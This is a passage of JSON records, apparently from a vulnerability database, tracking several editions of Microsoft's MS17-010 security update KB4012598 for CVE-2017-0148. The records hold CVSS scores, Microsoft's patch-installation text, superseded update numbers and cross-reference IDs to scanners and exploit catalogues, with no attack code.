"published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://support.microsoft.com/en-us/help/4012598", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-07-26T09:20:45", "history": [], "viewCount": 85, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:154690"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "nessus", "idList": ["700059.PRM", "MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-07-26T09:20:45", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-07-26T09:20:45", "rev": 2}}, "objectVersion": "1.5", "kb": "KB4012598", "msrc": "", "mscve": "CVE-2017-0148", "msplatform": "", "msfamily": "ESU", "msimpact": "Remote Code Execution", "msseverity": "Critical", "superseeds": ["KB2508429", "KB2536275", "KB957095", "KB923414", "KB917159", "KB3073921", "KB971468", "KB3130896", "KB982214", "KB958687", "KB3177186"], "parentseeds": ["KB5004305", "KB4512476", "KB5000844", "KB4561670", "KB4018466", "KB5001389", "KB4580378", "KB4489880", "KB4541506", "KB4493471", "KB4530695", "KB5004955", "KB4516026", "KB5003210", "KB4537810", "KB4577064", "KB4486465", "KB4556860", "KB4601360", "KB4586807", "KB4487019", "KB4571730", "KB4565536", "KB4503273", "KB4592498", "KB4520002", "KB4598288", "KB4550951", "KB4499149", "KB4525234", "KB4489876", "KB4507452", "KB4534303", "KB5003661", "KB4056759", "KB4487023"], "msproducts": ["9311", "4393", "9316", "9312", "10287", "9344", "9318"], "supportAreaPaths": [], "supportAreaPathNodes": [], "primarySupportAreaPath": []}, "lastseen": "2021-07-26T09:20:45", "differentElements": ["cvss2", "cvss3", "kb", "mscve", "msfamily", "msimpact", "msproducts", "msseverity", "parentseeds", "superseeds"], "edition": 5}, {"bulletin": {"id": "KB4012598", "vendorId": null, "hash": "851de0ec06547679dee9df230811ae821d194a533cb57e9be3b75171c11509cc", "type": "mskb", "bulletinFamily": "microsoft", "title": "Security update 2017-03-14", "description": "", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "href": "https://support.microsoft.com/en-us/help/4012598", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-07-26T09:20:45", "history": [], "viewCount": 84, "enchantments": {"dependencies": {"modified": "2021-07-26T09:20:45", "references": [{"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613"], "type": "zdt"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"], "type": "thn"}, {"idList": ["SMNTC-96706"], "type": "symantec"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["MS:CVE-2017-0148"], "type": "mscve"}, {"idList": ["CVE-2017-0148"], "type": "cve"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"], "type": "exploitdb"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2021-07-26T09:20:45", "rev": 2, "value": 7.5, "vector": "NONE"}}, "objectVersion": "1.5", "kb": "", "msrc": "", "mscve": "", "msplatform": "", "msfamily": "", "msimpact": "", "msseverity": "", "superseeds": [], "parentseeds": [], "msproducts": [], "supportAreaPaths": [], "supportAreaPathNodes": [], "primarySupportAreaPath": []}, "lastseen": "2021-07-26T09:20:45", "differentElements": ["cvss2", "cvss3", "description", "kb", "mscve", "msfamily", "msimpact", "msproducts", "msseverity", "parentseeds", "superseeds", "title"], "edition": 6}, {"bulletin": {"id": "KB4012598", "vendorId": null, "hash": "7ff4093964dbcdab69ceb4c12ddd23c6", "type": "mskb", "bulletinFamily": "microsoft", "title": "MS17-010: Description of the security update for Windows SMB Server: March 14, 2017", "description": "None\n\n## Summary\n\nThis security update resolves vulnerabilities in Microsoft Windows. The most\nsevere of the vulnerabilities could allow remote code execution if an attacker\nsends specially crafted messages to a Microsoft Server Message Block 1.0\n(SMBv1) server. \n \nTo learn more about the vulnerability, see [Microsoft Security Bulletin\nMS17-010](https://technet.microsoft.com/library/security/ms17-010).\n\n## More Information\n\nImportant \n \n\n * If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](https://technet.microsoft.com/en-us/library/hh825699).\n\n## How to obtain and install the update\n\n### Method 1: Windows Update\n\nThis update is available through Windows Update. When you turn on automatic\nupdating, this update will be downloaded and installed automatically. For more\ninformation about how to turn on automatic updating, see [Get security updates\nautomatically](https://www.microsoft.com/en-us/safety/pc-\nsecurity/updates.aspx). \n \n\n### Method 2: Microsoft Update Catalog\n\nTo get the stand-alone package for this update, go to the [Microsoft Update\nCatalog](http://catalog.update.microsoft.com/v7/site/search.aspx?q=4012598)\nwebsite. \n\n## More Information\n\n##\n\n __\n\nHow to obtain help and support for this security update\n\nHelp for installing updates: [Windows Update:\nFAQ](http://support.microsoft.com/ph/6527) \n \nSecurity solutions for IT professionals: [TechNet Security Support and\nTroubleshooting](https://technet.microsoft.com/security/bb980617.aspx) \n \nHelp for protecting your Windows-based computer from viruses and malware:\n[Microsoft Secure](http://support.microsoft.com/contactus/cu_sc_virsec_master) \n \nLocal support according to your country: [International\nSupport](https://www.microsoft.com/en-us/locale.aspx) \n\nFile Information\n\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://support.microsoft.com/en-us/help/4012598", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-08-12T22:04:32", "history": [], "viewCount": 85, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27613", "1337DAY-ID-27752"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:156196", "PACKETSTORM:142181"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-08-12T22:04:32", "rev": 2}, "score": {"value": 6.4, "vector": "NONE", "modified": "2021-08-12T22:04:32", "rev": 2}}, "objectVersion": "1.6", "kb": "KB4012598", "msrc": "", "mscve": "CVE-2017-0148", "msplatform": "", "msfamily": "ESU", "msimpact": "Remote Code Execution", "msseverity": "Critical", "superseeds": ["KB958687", "KB982214", "KB971468", "KB3073921", "KB957095", "KB3130896", "KB917159", "KB3177186", "KB923414", "KB2508429", "KB2536275"], "parentseeds": ["KB4541506", "KB4534303", "KB4512476", "KB5005090", "KB4565536", "KB5003210", "KB4507452", "KB4561670", "KB4586807", "KB4550951", "KB5004955", "KB4592498", "KB4056759", "KB4493471", "KB5000844", "KB4018466", "KB4598288", "KB4487019", "KB4577064", "KB4571730", "KB4486465", "KB4489880", "KB5001389", "KB4580378", "KB4537810", "KB5004305", "KB4516026", "KB4489876", "KB4503273", "KB4601360", "KB4556860", "KB4530695", "KB4499149", "KB4525234", "KB4487023", "KB5003661", "KB4520002"], "msproducts": ["10287", "4393", "9344", "9312", "9318", "9311", "9316"], "supportAreaPaths": [], "supportAreaPathNodes": [], "primarySupportAreaPath": []}, "lastseen": "2021-08-12T22:04:32", "differentElements": ["description", "title"], "edition": 7}, {"bulletin": {"id": "KB4012598", "vendorId": null, "hash": "35679c4e8f14a51dfb43a335d275931d", "type": "mskb", "bulletinFamily": "microsoft", "title": "Security update 2017-03-14", "description": "", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://support.microsoft.com/en-us/help/4012598", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-08-26T10:51:42", "history": [], "viewCount": 85, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA10979", "KLA11902"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196", "PACKETSTORM:154690"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:41987"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700099.PRM", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-08-26T10:51:42", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-08-26T10:51:42", "rev": 2}}, "objectVersion": "1.6", "kb": "KB4012598", "msrc": "", "mscve": "CVE-2017-0148", "msplatform": "", "msfamily": "ESU", "msimpact": "Remote Code Execution", "msseverity": "Critical", "superseeds": ["KB2536275", "KB3177186", "KB957095", "KB917159", "KB958687", "KB3130896", "KB2508429", "KB971468", "KB3073921", "KB923414", "KB982214"], "parentseeds": ["KB5000844", "KB4056759", "KB4550951", "KB5005090", "KB4598288", "KB4561670", "KB4586807", "KB4601360", "KB4018466", "KB4493471", "KB4489876", "KB4592498", "KB4556860", "KB4499149", "KB4486465", "KB5004955", "KB4520002", "KB5001389", "KB4577064", "KB5003210", "KB4565536", "KB4487023", "KB4534303", "KB4489880", "KB5003661", "KB4507452", "KB4512476", "KB4525234", "KB4537810", "KB5004305", "KB4580378", "KB4571730", "KB4541506", "KB4503273", "KB4530695", "KB4487019", "KB4516026"], "msproducts": ["9312", "4393", "9344", "9318", "9311", "9316", "10287"], "supportAreaPaths": [], "supportAreaPathNodes": [], "primarySupportAreaPath": []}, "lastseen": "2021-08-26T10:51:42", "differentElements": ["description", "title"], "edition": 8}, {"bulletin": {"id": "KB4012598", "vendorId": null, "hash": "7ff4093964dbcdab69ceb4c12ddd23c6", "type": "mskb", "bulletinFamily": "microsoft", "title": "MS17-010: Description of the security update for Windows SMB Server: March 14, 2017", "description": "None\n\n## Summary\n\nThis security update resolves vulnerabilities in Microsoft Windows. The most\nsevere of the vulnerabilities could allow remote code execution if an attacker\nsends specially crafted messages to a Microsoft Server Message Block 1.0\n(SMBv1) server. \n \nTo learn more about the vulnerability, see [Microsoft Security Bulletin\nMS17-010](https://technet.microsoft.com/library/security/ms17-010).\n\n## More Information\n\nImportant \n \n\n * If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](https://technet.microsoft.com/en-us/library/hh825699).\n\n## How to obtain and install the update\n\n### Method 1: Windows Update\n\nThis update is available through Windows Update. When you turn on automatic\nupdating, this update will be downloaded and installed automatically. For more\ninformation about how to turn on automatic updating, see [Get security updates\nautomatically](https://www.microsoft.com/en-us/safety/pc-\nsecurity/updates.aspx). \n \n\n### Method 2: Microsoft Update Catalog\n\nTo get the stand-alone package for this update, go to the [Microsoft Update\nCatalog](http://catalog.update.microsoft.com/v7/site/search.aspx?q=4012598)\nwebsite. \n\n## More Information\n\n##\n\n __\n\nHow to obtain help and support for this security update\n\nHelp for installing updates: [Windows Update:\nFAQ](http://support.microsoft.com/ph/6527) \n \nSecurity solutions for IT professionals: [TechNet Security Support and\nTroubleshooting](https://technet.microsoft.com/security/bb980617.aspx) \n \nHelp for protecting your Windows-based computer from viruses and malware:\n[Microsoft Secure](http://support.microsoft.com/contactus/cu_sc_virsec_master) \n \nLocal support according to your country: [International\nSupport](https://www.microsoft.com/en-us/locale.aspx) \n\nFile Information\n\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://support.microsoft.com/en-us/help/4012598", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-07T16:58:39", "history": [], "viewCount": 85, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:154690"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-33895"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "nessus", "idList": ["700099.PRM", "700059.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-07T16:58:39", "rev": 2}, "score": {"value": 6.4, "vector": "NONE", "modified": "2021-09-07T16:58:39", "rev": 2}}, "objectVersion": "1.6", "kb": "KB4012598", "msrc": "", "mscve": "CVE-2017-0148", "msplatform": "", "msfamily": "ESU", "msimpact": "Remote Code Execution", "msseverity": "Critical", "superseeds": ["KB982214", "KB917159", "KB957095", "KB923414", "KB971468", "KB3073921", "KB3130896", "KB958687", "KB2536275", "KB3177186", "KB2508429"], "parentseeds": ["KB4486465", "KB4550951", "KB4487019", "KB4530695", "KB4489880", "KB5000844", "KB4503273", "KB4541506", "KB4561670", "KB4571730", "KB4586807", "KB5003661", "KB4018466", "KB4516026", "KB4493471", "KB4499149", "KB5003210", "KB4598288", "KB4512476", "KB4056759", "KB4520002", "KB4487023", "KB4537810", "KB4565536", "KB4507452", "KB4592498", "KB5004955", "KB5004305", "KB4601360", "KB4580378", "KB5005090", "KB5001389", "KB4525234", "KB4577064", "KB4489876", "KB4556860", "KB4534303"], "msproducts": ["9318", "9344", "4393", "9312", "9311", "9316", "10287"], "supportAreaPaths": [], "supportAreaPathNodes": [], "primarySupportAreaPath": []}, "lastseen": "2021-09-07T16:58:39", "differentElements": ["parentseeds"], "edition": 9}, {"bulletin": {"id": "KB4012598", "vendorId": null, "hash": "5189dba2423d8256e4a60788b2d8d950", "type": "mskb", "bulletinFamily": "microsoft", "title": "MS17-010: Description of the security update for Windows SMB Server: March 14, 2017", "description": "None\n\n## Summary\n\nThis security update resolves vulnerabilities in Microsoft Windows. The most\nsevere of the vulnerabilities could allow remote code execution if an attacker\nsends specially crafted messages to a Microsoft Server Message Block 1.0\n(SMBv1) server. \n \nTo learn more about the vulnerability, see [Microsoft Security Bulletin\nMS17-010](https://technet.microsoft.com/library/security/ms17-010).\n\n## More Information\n\nImportant \n \n\n * If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](https://technet.microsoft.com/en-us/library/hh825699).\n\n## How to obtain and install the update\n\n### Method 1: Windows Update\n\nThis update is available through Windows Update. When you turn on automatic\nupdating, this update will be downloaded and installed automatically. For more\ninformation about how to turn on automatic updating, see [Get security updates\nautomatically](https://www.microsoft.com/en-us/safety/pc-\nsecurity/updates.aspx). \n \n\n### Method 2: Microsoft Update Catalog\n\nTo get the stand-alone package for this update, go to the [Microsoft 